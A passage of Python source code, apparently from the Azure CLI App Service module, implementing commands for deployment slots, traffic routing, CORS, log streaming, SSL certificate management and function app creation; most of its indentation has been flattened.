break
cd_settings = {}
cd_settings['DOCKER_ENABLE_CI'] = docker_enabled
if docker_enabled:
credentials = list_publishing_credentials(cmd, resource_group_name, name, slot)
if credentials:
cd_url = credentials.scm_uri + '/docker/hook'
cd_settings['CI_CD_URL'] = cd_url
else:
cd_settings['CI_CD_URL'] = ''
return cd_settings
def view_in_browser(cmd, resource_group_name, name, slot=None, logs=False):
url = _get_url(cmd, resource_group_name, name, slot)
open_page_in_browser(url)
if logs:
get_streaming_log(cmd, resource_group_name, name, provider=None, slot=slot)
def _get_url(cmd, resource_group_name, name, slot=None):
SslState = cmd.get_models('SslState')
site = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
    url = site.enabled_host_names[0]  # picks the custom domain URL in case a domain is assigned
ssl_host = next((h for h in site.host_name_ssl_states
if h.ssl_state != SslState.disabled), None)
return ('https' if ssl_host else 'http') + '://' + url
# TODO: expose new blob suport
def config_diagnostics(cmd, resource_group_name, name, level=None,
application_logging=None, web_server_logging=None,
docker_container_logging=None, detailed_error_messages=None,
failed_request_tracing=None, slot=None):
from azure.mgmt.web.models import (FileSystemApplicationLogsConfig, ApplicationLogsConfig,
SiteLogsConfig, HttpLogsConfig, FileSystemHttpLogsConfig,
EnabledConfig)
client = web_client_factory(cmd.cli_ctx)
# TODO: ensure we call get_site only once
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
location = site.location
application_logs = None
if application_logging is not None:
if not application_logging:
level = 'Off'
elif level is None:
level = 'Error'
fs_log = FileSystemApplicationLogsConfig(level=level)
application_logs = ApplicationLogsConfig(file_system=fs_log)
http_logs = None
server_logging_option = web_server_logging or docker_container_logging
if server_logging_option:
        # TODO: az blob storage log config currently not in use, will be implemented later.
# Tracked as Issue: #4764 on Github
filesystem_log_config = None
turned_on = server_logging_option != 'off'
if server_logging_option in ['filesystem', 'off']:
            # 100 MB max log size, retention lasts 3 days. Yes, we hard-code it; the portal does too
filesystem_log_config = FileSystemHttpLogsConfig(retention_in_mb=100, retention_in_days=3,
enabled=turned_on)
http_logs = HttpLogsConfig(file_system=filesystem_log_config, azure_blob_storage=None)
detailed_error_messages_logs = (None if detailed_error_messages is None
else EnabledConfig(enabled=detailed_error_messages))
failed_request_tracing_logs = (None if failed_request_tracing is None
else EnabledConfig(enabled=failed_request_tracing))
site_log_config = SiteLogsConfig(location=location,
application_logs=application_logs,
http_logs=http_logs,
failed_requests_tracing=failed_request_tracing_logs,
detailed_error_messages=detailed_error_messages_logs)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_diagnostic_logs_config',
slot, site_log_config)
def show_diagnostic_settings(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_diagnostic_logs_configuration', slot)
def config_slot_auto_swap(cmd, resource_group_name, webapp, slot, auto_swap_slot=None, disable=None):
client = web_client_factory(cmd.cli_ctx)
site_config = client.web_apps.get_configuration_slot(resource_group_name, webapp, slot)
site_config.auto_swap_slot_name = '' if disable else (auto_swap_slot or 'production')
return client.web_apps.update_configuration_slot(resource_group_name, webapp, site_config, slot)
def list_slots(cmd, resource_group_name, webapp):
client = web_client_factory(cmd.cli_ctx)
slots = list(client.web_apps.list_slots(resource_group_name, webapp))
for slot in slots:
slot.name = slot.name.split('/')[-1]
setattr(slot, 'app_service_plan', parse_resource_id(slot.server_farm_id)['name'])
del slot.server_farm_id
return slots
def swap_slot(cmd, resource_group_name, webapp, slot, target_slot=None, action='swap'):
client = web_client_factory(cmd.cli_ctx)
if action == 'swap':
poller = client.web_apps.swap_slot_slot(resource_group_name, webapp,
slot, (target_slot or 'production'), True)
return poller
if action == 'preview':
if target_slot is None:
result = client.web_apps.apply_slot_config_to_production(resource_group_name,
webapp, slot, True)
else:
result = client.web_apps.apply_slot_configuration_slot(resource_group_name, webapp,
slot, target_slot, True)
return result
# we will reset both source slot and target slot
if target_slot is None:
client.web_apps.reset_production_slot_config(resource_group_name, webapp)
else:
client.web_apps.reset_slot_configuration_slot(resource_group_name, webapp, target_slot)
return None
def delete_slot(cmd, resource_group_name, webapp, slot):
client = web_client_factory(cmd.cli_ctx)
# TODO: once swagger finalized, expose other parameters like: delete_all_slots, etc...
client.web_apps.delete_slot(resource_group_name, webapp, slot)
def set_traffic_routing(cmd, resource_group_name, name, distribution):
RampUpRule = cmd.get_models('RampUpRule')
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
configs = get_site_configs(cmd, resource_group_name, name)
host_name_split = site.default_host_name.split('.', 1)
host_name_suffix = '.' + host_name_split[1]
host_name_val = host_name_split[0]
configs.experiments.ramp_up_rules = []
for r in distribution:
slot, percentage = r.split('=')
action_host_name_slot = host_name_val + "-" + slot
configs.experiments.ramp_up_rules.append(RampUpRule(action_host_name=action_host_name_slot + host_name_suffix,
reroute_percentage=float(percentage),
name=slot))
_generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', None, configs)
return configs.experiments.ramp_up_rules
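# Expected shape of 'distribution' (slot names/percentages are examples only):
#   ['staging=20', 'dev=5']
# Each entry becomes a RampUpRule routing the given percentage of traffic to
# '<app>-<slot>.<default host suffix>'; passing an empty list clears all rules.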
def show_traffic_routing(cmd, resource_group_name, name):
configs = get_site_configs(cmd, resource_group_name, name)
return configs.experiments.ramp_up_rules
def clear_traffic_routing(cmd, resource_group_name, name):
set_traffic_routing(cmd, resource_group_name, name, [])
def add_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
from azure.mgmt.web.models import CorsSettings
configs = get_site_configs(cmd, resource_group_name, name, slot)
if not configs.cors:
configs.cors = CorsSettings()
configs.cors.allowed_origins = (configs.cors.allowed_origins or []) + allowed_origins
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
return result.cors
def remove_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
if configs.cors:
if allowed_origins:
configs.cors.allowed_origins = [x for x in (configs.cors.allowed_origins or []) if x not in allowed_origins]
else:
configs.cors.allowed_origins = []
configs = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
return configs.cors
def show_cors(cmd, resource_group_name, name, slot=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
return configs.cors
def get_streaming_log(cmd, resource_group_name, name, provider=None, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
streaming_url = scm_url + '/logstream'
if provider:
streaming_url += ('/' + provider.lstrip('/'))
user, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
t = threading.Thread(target=_get_log, args=(streaming_url, user, password))
t.daemon = True
t.start()
while True:
time.sleep(100) # so that ctrl+c can stop the command
def download_historical_logs(cmd, resource_group_name, name, log_file=None, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
url = scm_url.rstrip('/') + '/dump'
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
_get_log(url, user_name, password, log_file)
logger.warning('Downloaded logs to %s', log_file)
def _get_site_credential(cli_ctx, resource_group_name, name, slot=None):
creds = _generic_site_operation(cli_ctx, resource_group_name, name, 'list_publishing_credentials', slot)
creds = creds.result()
return (creds.publishing_user_name, creds.publishing_password)
def _get_log(url, user_name, password, log_file=None):
import certifi
import urllib3
try:
import urllib3.contrib.pyopenssl
urllib3.contrib.pyopenssl.inject_into_urllib3()
except ImportError:
pass
http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED', ca_certs=certifi.where())
headers = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
r = http.request(
'GET',
url,
headers=headers,
preload_content=False
)
if r.status != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
url, r.status, r.reason))
if log_file: # download logs
with open(log_file, 'wb') as f:
while True:
data = r.read(1024)
if not data:
break
f.write(data)
else: # streaming
std_encoding = sys.stdout.encoding
for chunk in r.stream():
if chunk:
                # Extra encode() and decode for stdout which does not support 'utf-8'
print(chunk.decode(encoding='utf-8', errors='replace')
.encode(std_encoding, errors='replace')
.decode(std_encoding, errors='replace'), end='') # each line of log has CRLF.
r.release_conn()
def upload_ssl_cert(cmd, resource_group_name, name, certificate_password, certificate_file, slot=None):
Certificate = cmd.get_models('Certificate')
client = web_client_factory(cmd.cli_ctx)
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
    with open(certificate_file, 'rb') as cert_file:
        cert_contents = cert_file.read()
hosting_environment_profile_param = (webapp.hosting_environment_profile.name
if webapp.hosting_environment_profile else '')
thumb_print = _get_cert(certificate_password, certificate_file)
cert_name = _generate_cert_name(thumb_print, hosting_environment_profile_param,
webapp.location, resource_group_name)
cert = Certificate(password=certificate_password, pfx_blob=cert_contents,
location=webapp.location, server_farm_id=webapp.server_farm_id)
return client.certificates.create_or_update(resource_group_name, cert_name, cert)
def _generate_cert_name(thumb_print, hosting_environment, location, resource_group_name):
return "%s_%s_%s_%s" % (thumb_print, hosting_environment, location, resource_group_name)
def _get_cert(certificate_password, certificate_file):
''' Decrypts the .pfx file '''
    with open(certificate_file, 'rb') as f:
        p12 = OpenSSL.crypto.load_pkcs12(f.read(), certificate_password)
cert = p12.get_certificate()
digest_algorithm = 'sha1'
thumbprint = cert.digest(digest_algorithm).decode("utf-8").replace(':', '')
return thumbprint
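# Example (hypothetical value): cert.digest('sha1') yields a colon-separated hex string such as
# b'AB:CD:EF:12', so _get_cert would return 'ABCDEF12' once the colons are stripped.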
def list_ssl_certs(cmd, resource_group_name):
client = web_client_factory(cmd.cli_ctx)
return client.certificates.list_by_resource_group(resource_group_name)
def delete_ssl_cert(cmd, resource_group_name, certificate_thumbprint):
client = web_client_factory(cmd.cli_ctx)
webapp_certs = client.certificates.list_by_resource_group(resource_group_name)
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
return client.certificates.delete(resource_group_name, webapp_cert.name)
raise CLIError("Certificate for thumbprint '{}' not found".format(certificate_thumbprint))
def import_ssl_cert(cmd, resource_group_name, name, key_vault, key_vault_certificate_name):
Certificate = cmd.get_models('Certificate')
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, name)
if not webapp:
raise CLIError("'{}' app doesn't exist in resource group {}".format(name, resource_group_name))
server_farm_id = webapp.server_farm_id
location = webapp.location
kv_id = _format_key_vault_id(cmd.cli_ctx, key_vault, resource_group_name)
kv_id_parts = parse_resource_id(kv_id)
kv_name = kv_id_parts['name']
kv_resource_group_name = kv_id_parts['resource_group']
kv_subscription = kv_id_parts['subscription']
cert_name = '{}-{}-{}'.format(resource_group_name, kv_name, key_vault_certificate_name)
lnk = 'https://azure.github.io/AppService/2016/05/24/Deploying-Azure-Web-App-Certificate-through-Key-Vault.html'
lnk_msg = 'Find more details here: {}'.format(lnk)
if not _check_service_principal_permissions(cmd, kv_resource_group_name, kv_name, kv_subscription):
logger.warning('Unable to verify Key Vault permissions.')
logger.warning('You may need to grant Microsoft.Azure.WebSites service principal the Secret:Get permission')
logger.warning(lnk_msg)
kv_cert_def = Certificate(location=location, key_vault_id=kv_id, password='',
key_vault_secret_name=key_vault_certificate_name, server_farm_id=server_farm_id)
return client.certificates.create_or_update(name=cert_name, resource_group_name=resource_group_name,
certificate_envelope=kv_cert_def)
def create_managed_ssl_cert(cmd, resource_group_name, name, hostname, slot=None):
Certificate = cmd.get_models('Certificate')
hostname = hostname.lower()
client = web_client_factory(cmd.cli_ctx)
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not webapp:
slot_text = "Deployment slot {} in ".format(slot) if slot else ''
raise CLIError("{0}app {1} doesn't exist in resource group {2}".format(slot_text, name, resource_group_name))
parsed_plan_id = parse_resource_id(webapp.server_farm_id)
plan_info = client.app_service_plans.get(parsed_plan_id['resource_group'], parsed_plan_id['name'])
    if plan_info.sku.tier.upper() in ('FREE', 'SHARED'):
raise CLIError('Managed Certificate is not supported on Free and Shared tier.')
if not _verify_hostname_binding(cmd, resource_group_name, name, hostname, slot):
slot_text = " --slot {}".format(slot) if slot else ""
raise CLIError("Hostname (custom domain) '{0}' is not registered with {1}. "
"Use 'az webapp config hostname add --resource-group {2} "
"--webapp-name {1}{3} --hostname {0}' "
"to register the hostname.".format(hostname, name, resource_group_name, slot_text))
server_farm_id = webapp.server_farm_id
location = webapp.location
easy_cert_def = Certificate(location=location, canonical_name=hostname,
server_farm_id=server_farm_id, password='')
return client.certificates.create_or_update(name=hostname, resource_group_name=resource_group_name,
certificate_envelope=easy_cert_def)
def _check_service_principal_permissions(cmd, resource_group_name, key_vault_name, key_vault_subscription):
from azure.cli.command_modules.keyvault._client_factory import keyvault_client_vaults_factory
from azure.cli.command_modules.role._client_factory import _graph_client_factory
from azure.graphrbac.models import GraphErrorException
from azure.cli.core.commands.client_factory import get_subscription_id
subscription = get_subscription_id(cmd.cli_ctx)
# Cannot check if key vault is in another subscription
if subscription != key_vault_subscription:
return False
kv_client = keyvault_client_vaults_factory(cmd.cli_ctx, None)
vault = kv_client.get(resource_group_name=resource_group_name, vault_name=key_vault_name)
# Check for Microsoft.Azure.WebSites app registration
AZURE_PUBLIC_WEBSITES_APP_ID = 'abfa0a7c-a6b6-4736-8310-5855508787cd'
AZURE_GOV_WEBSITES_APP_ID = '6a02c803-dafd-4136-b4c3-5a6f318b4714'
graph_sp_client = _graph_client_factory(cmd.cli_ctx).service_principals
for policy in vault.properties.access_policies:
try:
sp = graph_sp_client.get(policy.object_id)
if sp.app_id == AZURE_PUBLIC_WEBSITES_APP_ID or sp.app_id == AZURE_GOV_WEBSITES_APP_ID:
for perm in policy.permissions.secrets:
if perm == "Get":
return True
except GraphErrorException:
pass # Lookup will fail for non service principals (users, groups, etc.)
return False
def _update_host_name_ssl_state(cmd, resource_group_name, webapp_name, webapp,
host_name, ssl_state, thumbprint, slot=None):
Site, HostNameSslState = cmd.get_models('Site', 'HostNameSslState')
updated_webapp = Site(host_name_ssl_states=[HostNameSslState(name=host_name,
ssl_state=ssl_state,
thumbprint=thumbprint,
to_update=True)],
location=webapp.location, tags=webapp.tags)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'create_or_update',
slot, updated_webapp)
def _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(name))
cert_resource_group_name = parse_resource_id(webapp.server_farm_id)['resource_group']
webapp_certs = client.certificates.list_by_resource_group(cert_resource_group_name)
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
if len(webapp_cert.host_names) == 1 and not webapp_cert.host_names[0].startswith('*'):
return _update_host_name_ssl_state(cmd, resource_group_name, name, webapp,
webapp_cert.host_names[0], ssl_type,
certificate_thumbprint, slot)
query_result = list_hostnames(cmd, resource_group_name, name, slot)
hostnames_in_webapp = [x.name.split('/')[-1] for x in query_result]
to_update = _match_host_names_from_cert(webapp_cert.host_names, hostnames_in_webapp)
for h in to_update:
_update_host_name_ssl_state(cmd, resource_group_name, name, webapp,
h, ssl_type, certificate_thumbprint, slot)
return show_webapp(cmd, resource_group_name, name, slot)
raise CLIError("Certificate for thumbprint '{}' not found.".format(certificate_thumbprint))
def bind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
SslState = cmd.get_models('SslState')
return _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint,
SslState.sni_enabled if ssl_type == 'SNI' else SslState.ip_based_enabled, slot)
def unbind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, slot=None):
SslState = cmd.get_models('SslState')
return _update_ssl_binding(cmd, resource_group_name, name,
certificate_thumbprint, SslState.disabled, slot)
def _match_host_names_from_cert(hostnames_from_cert, hostnames_in_webapp):
# the goal is to match '*.foo.com' with host name like 'admin.foo.com', 'logs.foo.com', etc
matched = set()
for hostname in hostnames_from_cert:
if hostname.startswith('*'):
for h in hostnames_in_webapp:
if hostname[hostname.find('.'):] == h[h.find('.'):]:
matched.add(h)
elif hostname in hostnames_in_webapp:
matched.add(hostname)
return matched
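# Example (hypothetical host names): a wildcard entry is matched on everything after the first dot, so
#   _match_host_names_from_cert(['*.contoso.com'], ['admin.contoso.com', 'contoso.org'])
# returns {'admin.contoso.com'}, while a non-wildcard entry only matches an identical host name.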
# helper class that handles runtime stacks in formats like 'node|6.1', 'php|5.5'
class _StackRuntimeHelper(object):
def __init__(self, cmd, client, linux=False):
self._cmd = cmd
self._client = client
self._linux = linux
self._stacks = []
def resolve(self, display_name):
self._load_stacks()
return next((s for s in self._stacks if s['displayName'].lower() == display_name.lower()),
None)
@property
def stacks(self):
self._load_stacks()
return self._stacks
@staticmethod
def update_site_config(stack, site_config, cmd=None):
for k, v in stack['configs'].items():
setattr(site_config, k, v)
return site_config
@staticmethod
def update_site_appsettings(cmd, stack, site_config):
NameValuePair = cmd.get_models('NameValuePair')
if site_config.app_settings is None:
site_config.app_settings = []
site_config.app_settings += [NameValuePair(name=k, value=v) for k, v in stack['configs'].items()]
return site_config
def _load_stacks(self):
if self._stacks:
return
os_type = ('Linux' if self._linux else 'Windows')
raw_stacks = self._client.provider.get_available_stacks(os_type_selected=os_type, raw=True)
bytes_value = raw_stacks._get_next().content # pylint: disable=protected-access
json_value = bytes_value.decode('utf8')
json_stacks = json.loads(json_value)
stacks = json_stacks['value']
result = []
if self._linux:
for properties in [(s['properties']) for s in stacks]:
for major in properties['majorVersions']:
default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']),
None)
result.append({
'displayName': (default_minor['runtimeVersion']
if default_minor else major['runtimeVersion'])
})
else: # Windows stacks
config_mappings = {
'node': 'WEBSITE_NODE_DEFAULT_VERSION',
'python': 'python_version',
'php': 'php_version',
'aspnet': 'net_framework_version'
}
            # get all stack versions except 'java'
for stack in stacks:
if stack['name'] not in config_mappings:
continue
name, properties = stack['name'], stack['properties']
for major in properties['majorVersions']:
default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']),
None)
result.append({
'displayName': name + '|' + major['displayVersion'],
'configs': {
config_mappings[name]: (default_minor['runtimeVersion']
if default_minor else major['runtimeVersion'])
}
})
# deal with java, which pairs with java container version
java_stack = next((s for s in stacks if s['name'] == 'java'))
java_container_stack = next((s for s in stacks if s['name'] == 'javaContainers'))
for java_version in java_stack['properties']['majorVersions']:
for fx in java_container_stack['properties']['frameworks']:
for fx_version in fx['majorVersions']:
result.append({
'displayName': 'java|{}|{}|{}'.format(java_version['displayVersion'],
fx['display'],
fx_version['displayVersion']),
'configs': {
'java_version': java_version['runtimeVersion'],
'java_container': fx['name'],
'java_container_version': fx_version['runtimeVersion']
}
})
for r in result:
r['setter'] = (_StackRuntimeHelper.update_site_appsettings if 'node' in
r['displayName'] else _StackRuntimeHelper.update_site_config)
self._stacks = result
def get_app_insights_key(cli_ctx, resource_group, name):
appinsights_client = get_mgmt_service_client(cli_ctx, ApplicationInsightsManagementClient)
appinsights = appinsights_client.components.get(resource_group, name)
if appinsights is None or appinsights.instrumentation_key is None:
raise CLIError("App Insights {} under resource group {} was not found.".format(name, resource_group))
return appinsights.instrumentation_key
def create_functionapp_app_service_plan(cmd, resource_group_name, name, is_linux, sku,
number_of_workers=None, max_burst=None, location=None, tags=None):
SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
sku = _normalize_sku(sku)
tier = get_sku_name(sku)
if max_burst is not None:
if tier.lower() != "elasticpremium":
raise CLIError("Usage error: --max-burst is only supported for Elastic Premium (EP) plans")
max_burst = validate_range_of_int_flag('--max-burst', max_burst, min_val=0, max_val=20)
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers / --min-elastic-worker-count',
number_of_workers, min_val=0, max_val=20)
client = web_client_factory(cmd.cli_ctx)
if location is None:
location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
sku_def = SkuDescription(tier=tier, name=sku, capacity=number_of_workers)
plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def,
reserved=(is_linux or None), maximum_elastic_worker_count=max_burst,
hyper_v=None, name=name)
return client.app_service_plans.create_or_update(resource_group_name, name, plan_def)
def is_plan_consumption(cmd, plan_info):
SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
if isinstance(plan_info, AppServicePlan):
if isinstance(plan_info.sku, SkuDescription):
return plan_info.sku.tier.lower() == 'dynamic'
return False
def is_plan_elastic_premium(cmd, plan_info):
SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
if isinstance(plan_info, AppServicePlan):
if isinstance(plan_info.sku, SkuDescription):
return plan_info.sku.tier == 'ElasticPremium'
return False
def validate_and_convert_to_int(flag, val):
try:
return int(val)
except ValueError:
raise CLIError("Usage error: {} is expected to have an int value.".format(flag))
def validate_range_of_int_flag(flag_name, value, min_val, max_val):
value = validate_and_convert_to_int(flag_name, value)
if min_val > value or value > max_val:
raise CLIError("Usage error: {} is expected to be between {} and {} (inclusive)".format(flag_name, min_val,
max_val))
return value
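# Example (hypothetical flag and values): validate_range_of_int_flag('--max-burst', '5', min_val=0, max_val=20)
# returns 5, whereas '25' or a non-numeric string raises a CLIError via the two checks above.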
def create_function(cmd, resource_group_name, name, storage_account, plan=None,
os_type=None, functions_version=None, runtime=None, runtime_version=None,
consumption_plan_location=None, app_insights=None, app_insights_key=None,
disable_app_insights=None, deployment_source_url=None,
deployment_source_branch='master', deployment_local_git=None,
docker_registry_server_password=None, docker_registry_server_user=None,
deployment_container_image_name=None, tags=None):
# pylint: disable=too-many-statements, too-many-branches
if functions_version is None:
logger.warning("No functions version specified so defaulting to 2. In the future, specifying a version will "
"be required. To create a 2.x function you would pass in the flag `--functions-version 2`")
functions_version = '2'
if deployment_source_url and deployment_local_git:
raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')
if bool(plan) == bool(consumption_plan_location):
raise CLIError("usage error: --plan NAME_OR_ID | --consumption-plan-location LOCATION")
SiteConfig, Site, NameValuePair = cmd.get_models('SiteConfig', 'Site', 'NameValuePair')
docker_registry_server_url = parse_docker_image_name(deployment_container_image_name)
site_config = SiteConfig(app_settings=[])
functionapp_def = Site(location=None, site_config=site_config, tags=tags)
client = web_client_factory(cmd.cli_ctx)
plan_info = None
if runtime is not None:
runtime = runtime.lower()
if consumption_plan_location:
locations = list_consumption_locations(cmd)
location = next((l for l in locations if l['name'].lower() == consumption_plan_location.lower()), None)
if location is None:
raise CLIError("Location is invalid. Use: az functionapp list-consumption-locations")
functionapp_def.location = consumption_plan_location
functionapp_def.kind = 'functionapp'
# if os_type is None, the os type is windows
is_linux = os_type and os_type.lower() == 'linux'
else: # apps with SKU based plan
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(resource_group_name, plan)
if not plan_info:
raise CLIError("The plan '{}' doesn't exist".format(plan))
location = plan_info.location
is_linux = plan_info.reserved
functionapp_def.server_farm_id = plan
functionapp_def.location = location
if is_linux and not runtime and (consumption_plan_location or not deployment_container_image_name):
        raise CLIError(
            "usage error: --runtime RUNTIME is required for Linux function apps without a custom image.")
if runtime:
if is_linux and runtime not in LINUX_RUNTIMES:
raise CLIError("usage error: Currently supported runtimes (--runtime) in linux function apps are: {}."
.format(', '.join(LINUX_RUNTIMES)))
if not is_linux and runtime not in WINDOWS_RUNTIMES:
raise CLIError("usage error: Currently supported runtimes (--runtime) in windows function apps are: {}."
.format(', '.join(WINDOWS_RUNTIMES)))
site_config.app_settings.append(NameValuePair(name='FUNCTIONS_WORKER_RUNTIME', value=runtime))
if runtime_version is not None:
if runtime is None:
raise CLIError('Must specify --runtime to use --runtime-version')
allowed_versions = FUNCTIONS_VERSION_TO_SUPPORTED_RUNTIME_VERSIONS[functions_version][runtime]
if runtime_version not in allowed_versions:
raise CLIError('--runtime-version {} is not supported for the selected --runtime {} and '
'--functions_version {}. Supported versions are: {}'
.format(runtime_version, runtime, functions_version, ', '.join(allowed_versions)))
con_string = _validate_and_get_connection_string(cmd.cli_ctx, resource_group_name, storage_account)
if is_linux:
functionapp_def.kind = 'functionapp,linux'
functionapp_def.reserved = True
is_consumption = consumption_plan_location is not None
if not is_consumption:
site_config.app_settings.append(NameValuePair(name='MACHINEKEY_DecryptionKey',
value=str(hexlify(urandom(32)).decode()).upper()))
if deployment_container_image_name:
functionapp_def.kind = 'functionapp,linux,container'
site_config.app_settings.append(NameValuePair(name='DOCKER_CUSTOM_IMAGE_NAME',
value=deployment_container_image_name))
site_config.app_settings.append(NameValuePair(name='FUNCTION_APP_EDIT_MODE', value='readOnly'))
site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
value='false'))
site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
else:
site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
value='true'))
if runtime not in FUNCTIONS_VERSION_TO_SUPPORTED_RUNTIME_VERSIONS[functions_version]:
raise CLIError("An appropriate linux image for runtime:'{}', "
"functions_version: '{}' was not found".format(runtime, functions_version))
if deployment_container_image_name is None:
site_config.linux_fx_version = _get_linux_fx_functionapp(functions_version, runtime, runtime_version)
else:
functionapp_def.kind = 'functionapp'
    # add app settings to the site to make it a function app
site_config.app_settings.append(NameValuePair(name='FUNCTIONS_EXTENSION_VERSION',
value=_get_extension_version_functionapp(functions_version)))
site_config.app_settings.append(NameValuePair(name='AzureWebJobsStorage', value=con_string))
site_config.app_settings.append(NameValuePair(name='AzureWebJobsDashboard', value=con_string))
site_config.app_settings.append(NameValuePair(name='WEBSITE_NODE_DEFAULT_VERSION',
value=_get_website_node_version_functionapp(functions_version,
runtime,
runtime_version)))
# If plan is not consumption or elastic premium, we need to set always on
if consumption_plan_location is None and not is_plan_elastic_premium(cmd, plan_info):
site_config.always_on = True
# If plan is elastic premium or windows consumption, we need these app settings
is_windows_consumption = consumption_plan_location is not None and not is_linux
if is_plan_elastic_premium(cmd, plan_info) or is_windows_consumption:
site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTAZUREFILECONNECTIONSTRING',
value=con_string))
site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTSHARE', value=name.lower()))
create_app_insights = False
if app_insights_key is not None:
site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
value=app_insights_key))
elif app_insights is not None:
instrumentation_key = get_app_insights_key(cmd.cli_ctx, resource_group_name, app_insights)
site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
value=instrumentation_key))
elif not disable_app_insights:
create_app_insights = True
poller = client.web_apps.create_or_update(resource_group_name, name, functionapp_def)
functionapp = LongRunningOperation(cmd.cli_ctx)(poller)
if consumption_plan_location and is_linux:
        logger.warning("Your Linux function app '%s', which uses a consumption plan, has been created "
                       "successfully but is not active until content is published using "
                       "the Azure Portal or the Functions Core Tools.", name)
else:
_set_remote_or_local_git(cmd, functionapp, resource_group_name, name, deployment_source_url,
deployment_source_branch, deployment_local_git)
if create_app_insights:
try:
try_create_application_insights(cmd, functionapp)
except Exception: # pylint: disable=broad-except
logger.warning('Error while trying to create and configure an Application Insights for the Function App. '
'Please use the Azure Portal to create and configure the Application Insights, if needed.')
if deployment_container_image_name:
update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url,
deployment_container_image_name, docker_registry_server_user,
docker_registry_server_password)
return functionapp
def _get_extension_version_functionapp(functions_version):
if functions_version is not None:
return '~{}'.format(functions_version)
return '~2'
def _get_linux_fx_functionapp(functions_version, runtime, runtime_version):
if runtime == 'dotnet':
return runtime.upper()
if runtime_version is None:
runtime_version = FUNCTIONS_VERSION_TO_DEFAULT_RUNTIME_VERSION[functions_version][runtime]
return '{}|{}'.format(runtime.upper(), runtime_version)
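# Example (assuming FUNCTIONS_VERSION_TO_DEFAULT_RUNTIME_VERSION maps ('2', 'node') to '10'):
# _get_linux_fx_functionapp('2', 'node', None) would return 'NODE|10', while
# _get_linux_fx_functionapp('2', 'dotnet', None) returns just 'DOTNET'.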
def _get_website_node_version_functionapp(functions_version, runtime, runtime_version):
if runtime is None or runtime != 'node':
return FUNCTIONS_VERSION_TO_DEFAULT_NODE_VERSION[functions_version]
if runtime_version is not None:
return '~{}'.format(runtime_version)
return FUNCTIONS_VERSION_TO_DEFAULT_NODE_VERSION[functions_version]
def try_create_application_insights(cmd, functionapp):
creation_failed_warn = 'Unable to create the Application Insights for the Function App. ' \
'Please use the Azure Portal to manually create and configure the Application Insights, ' \
'if needed.'
ai_resource_group_name = functionapp.resource_group
ai_name = functionapp.name
ai_location = functionapp.location
app_insights_client = get_mgmt_service_client(cmd.cli_ctx, ApplicationInsightsManagementClient)
ai_properties = {
"name": ai_name,
"location": ai_location,
"kind": "web",
"properties": {
"Application_Type": "web"
}
}
appinsights = app_insights_client.components.create_or_update(ai_resource_group_name, ai_name, ai_properties)
if appinsights is None or appinsights.instrumentation_key is None:
logger.warning(creation_failed_warn)
return
    # Emit this success message as a warning so it does not interfere with the regular JSON output on stdout
logger.warning('Application Insights \"%s\" was created for this Function App. '
'You can visit https://portal.azure.com/#resource%s/overview to view your '
'Application Insights component', appinsights.name, appinsights.id)
update_app_settings(cmd, functionapp.resource_group, functionapp.name,
